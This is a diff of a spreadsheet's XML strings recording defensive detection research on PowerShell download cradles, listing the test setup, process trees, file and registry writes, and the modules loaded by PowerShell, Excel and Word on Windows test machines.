+      <t>Converts a PNG part of the icon to a legacy bmp icon - C:\Windows\System32\IconCodecService.dll
+Credential Vault Client Library - C:\Windows\SysWOW64\vaultcli.dll
+Fusion 2.5 - C:\Windows\SysWOW64\sxs.dll</t>
     </r>
   </si>
   <si>
@@ -6294,7 +5231,7 @@
         <rFont val="Calibri (Body)_x0000_"/>
       </rPr>
       <t xml:space="preserve">
-• Step thtough running each download cradle and record user agent/s (non TLS)
+• Step through running each download cradle and record user agent/s (non TLS)
 • Collect again to TLS to collect PCAP for JA3 analysis
 </t>
     </r>
@@ -6319,6 +5256,3982 @@
 • Focus on interesting filewrites that could be used for detection
 • As registry is super noisy, focus on interesting registry writes only
 • Confirm network connections by process</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Results
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>• Priliminary network results gatherd from wireshark normalised removing versioning
+• Endpoint results gathered from Splunk
+• Process tree - confirm correct GUID by starting at EventCode = 1 and match CommandLine and Image fields
+• Prefetch review (if required)
+• Repeat process to confirm and understand behaviours
+• Results confirmed and further tested in a live environment to understand network behaviours</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="18"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Setup
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>• Machines tested: Windows 10/Office 2016, Windows 8.1/Office 2016 and Win7/Office 2013 some supplementary testing different powershell versions for JA3
+• Sysmon rules looking at all events whitelisting relevant processes of interest.
+• Splunk UF collecting all sysmon logs
+• Build a whitelist of the machine running Powershell.exe, Excel, Word and IE so we can see additional modules and other activity
+• Wireshark was used each test for network indicators, validation of network in live environment</t>
+    </r>
+  </si>
+  <si>
+    <t>Child: Powershell.exe
+Parent: svchost.exe
+Child: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
+Parent: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
+Child: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:84 CREDAT:17410 /prefetch:2</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Iexplore.exe writes:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
+e.g
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\1FMKNKVK\test[1].txt
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\1FMKNKVK
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\JTJM57VR\test[1].ps1
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\JTJM57VR
+C:\Users\MATTHE~1\AppData\Local\Temp\~DF6093FCC19425AB01.TMP
+C:\Users\Matthew Green\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{2B1DAB05-3A3F-11E8-9562-186590DD2EB8}.dat
+C:\Users\MATTHE~1\AppData\Local\Temp\~DF0629A96F780B06A3.TMP
+C:\Users\Matthew Green\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{2B1DAB03-3A3F-11E8-9562-186590DD2EB8}.dat
+C:\Users\Matthew Green\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
+C:\Users\Matthew Green\AppData\Local\Microsoft\Internet Explorer\Recovery\High
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE
+C:\Users\MATTHE~1\AppData\Local\Temp\Low
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Virtualized</t>
+    </r>
+  </si>
+  <si>
+    <t>iexplore.exe,  no IOCs of note</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules::</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">DNS Client API DLL - C:\Windows\System32\dnsapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Fusion 2.5 - C:\Windows\System32\sxs.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Excel.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>App Resolver - C:\Windows\SysWOW64\AppResolver.dll
+Application Experience Program Cache - C:\Windows\SysWOW64\aepic.dll
+BranchCache Client Library - C:\Windows\SysWOW64\PeerDist.dll
+Client Interface - C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.18022-0\X86\MpClient.dll
+Cloud API user mode API - C:\Windows\SysWOW64\cldapi.dll
+Common Controls Library - C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.16299.248_none_d0271d135f36f548\comctl32.dll
+DAV Helper DLL - C:\Windows\SysWOW64\davhlpr.dll
+Data exchange - C:\Windows\SysWOW64\DataExchange.dll
+Els Core Platform DLL - C:\Windows\SysWOW64\ELSCore.dll
+Filter Library - C:\Windows\SysWOW64\fltLib.dll
+Fusion 2.5 - C:\Windows\SysWOW64\sxs.dll
+Group Policy Client API - C:\Windows\SysWOW64\gpapi.dll
+IOfficeAntiVirus Module - C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.18022-0\X86\MpOAV.dll
+Microsoft Access database engine DLL - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACECORE.DLL
+Microsoft Access database engine Expression Service - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACEES.DLL
+Microsoft Access database engine OLE DB Provider - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACEOLEDB.DLL
+Microsoft Access database engine Sort DLL - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\ACEWSTR.DLL
+Microsoft Office 2000 component - C:\Windows\SysWOW64\hlink.dll
+Microsoft Office Document Cache - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Csi.dll
+Microsoft Property System - C:\Windows\SysWOW64\propsys.dll
+Microsoft UI Automation Core - C:\Windows\SysWOW64\UIAutomationCore.dll
+Microsoft Visual Basic for Applications component - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL
+Microsoft® C Runtime Library - C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\msvcr100.dll
+Network Explorer - C:\Windows\SysWOW64\networkexplorer.dll
+OLE DB Core Services - C:\Program Files (x86)\Common Files\system\ole db\oledb32.dll
+OLE DB Runtime Routines - C:\Windows\SysWOW64\msdart.dll
+Offline Files Win32 API - C:\Windows\SysWOW64\cscapi.dll
+Policy Manager DLL - C:\Windows\SysWOW64\policymanager.dll
+Server Service Client DLL - C:\Windows\SysWOW64\srvcli.dll
+Shell extensions for sharing - C:\Windows\SysWOW64\ntshrui.dll
+Software Licensing Client Dll - C:\Windows\SysWOW64\slc.dll
+TFSOfficeAdd-in.dll - C:\Program Files\Common Files\microsoft shared\Team Foundation Server\15.0\x86\TFSOfficeAdd-in.dll
+Visual Basic Design Time Environment - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
+Visual Basic Environment International Resources - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL
+Visual Basic for Applications Development Environment - Expression Service Loader - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\VBAJET32.DLL
+Visual Basic for Applications Runtime - Expression Service - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\EXPSRV.DLL
+Windows File Protection - C:\Windows\SysWOW64\sfc.dll
+Windows File Protection - C:\Windows\SysWOW64\sfc_os.dll
+Windows Volume Tracking - C:\Windows\SysWOW64\linkinfo.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Excel.exe minimal activity of note:
+e.g
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VBA\VBEUI\DisableDynamicDpi
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VBA\Forms3\Controls\EnableDynamicDPI
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VBA\Forms3\Controls\EnableTelemetry
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VBA\Forms3\Controls\EnableWindowControl
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\Office\16.0\Common\Toolbars\Settings\Microsoft Excel
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\FB9AA6
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\FB9AA6\FB9AA6
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VisualStudio\15.0\TeamFoundation\OfficeIntegration\Excel\tbPosition
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VisualStudio\15.0\TeamFoundation\OfficeIntegration\Excel\tbRowIndex
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VisualStudio\15.0\TeamFoundation\OfficeIntegration\Excel\tbVisible
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VisualStudio\15.0\TeamFoundation\OfficeIntegration\Excel\tbHeight
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VisualStudio\15.0\TeamFoundation\OfficeIntegration\Excel\tbWidth
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VisualStudio\15.0\TeamFoundation\OfficeIntegration\Excel\tbLeft
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\VisualStudio\15.0\TeamFoundation\OfficeIntegration\Excel\tbTop
+HKLM\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\VBAFiles
+HKLM\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\AceFiles
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\Office\16.0\Common\SessionId
+HKLM\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\ProductFiles
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\~5
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\g6
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\OfficeCompat\Excel\AddinLoad\C:\Program Files\Common Files\Microsoft Shared\Team Foundation Server\15.0\x86\TFSOfficeAdd-in.dll
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\Office\16.0\Excel\AddInLoadTimes\TFCOfficeShim.Connect.15
+HKU\S-1-5-21-1498882421-1648887400-3257878455-1000\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\5
+HKLM\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\EXCELFiles</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Network Store Information RPC interface - C:\Windows\System32\winnsi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Winword.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>App Resolver - C:\Windows\SysWOW64\AppResolver.dll
+BranchCache Client Library - C:\Windows\SysWOW64\PeerDist.dll
+DAV Helper DLL - C:\Windows\SysWOW64\davhlpr.dll
+Els Core Platform DLL - C:\Windows\SysWOW64\ELSCore.dll
+Microsoft Access database engine DLL - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACECORE.DLL
+Microsoft Access database engine Expression Service - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACEES.DLL
+Microsoft Access database engine OLE DB Provider - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ACEOLEDB.DLL
+Microsoft Access database engine Sort DLL - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\ACEWSTR.DLL
+Microsoft Conversion Library - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\MSCONV97.DLL
+Microsoft Office 2000 component - C:\Windows\SysWOW64\hlink.dll
+Microsoft Office Document Cache - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Csi.dll
+Microsoft UI Automation Core - C:\Windows\SysWOW64\UIAutomationCore.dll
+Microsoft Visual Basic for Applications component - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL
+Microsoft® C Runtime Library - C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\msvcr100.dll
+OLE DB Core Services - C:\Program Files (x86)\Common Files\system\ole db\oledb32.dll
+OLE DB Runtime Routines - C:\Windows\SysWOW64\msdart.dll
+Offline Files Win32 API - C:\Windows\SysWOW64\cscapi.dll
+Policy Manager DLL - C:\Windows\SysWOW64\policymanager.dll
+Recover Text Converter - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\RECOVR32.CNV
+Server Service Client DLL - C:\Windows\SysWOW64\srvcli.dll
+Shell extensions for sharing - C:\Windows\SysWOW64\ntshrui.dll
+Visual Basic Design Time Environment - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
+Visual Basic Environment International Resources - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL
+Visual Basic for Applications Development Environment - Expression Service Loader - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\VBAJET32.DLL
+Visual Basic for Applications Runtime - Expression Service - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\EXPSRV.DLL
+Windows File Protection - C:\Windows\SysWOW64\sfc.dll
+Windows File Protection - C:\Windows\SysWOW64\sfc_os.dll
+Windows Volume Tracking - C:\Windows\SysWOW64\linkinfo.dll
+WordPerfect 5.x Converter - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\WPFT532.CNV
+WordPerfect 6.x - 7.0 Converter - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\WPFT632.CNV</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\542c2e5af7d5e3b6a94baf2bccd7a410\Microsoft.PowerShell.Commands.Management.ni.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">DNS Client API DLL - C:\Windows\System32\dnsapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Routing Utilities - C:\Windows\System32\rtutils.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Remote Access Connection Manager - C:\Windows\System32\rasman.dll
+Remote Access API - C:\Windows\System32\rasapi32.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
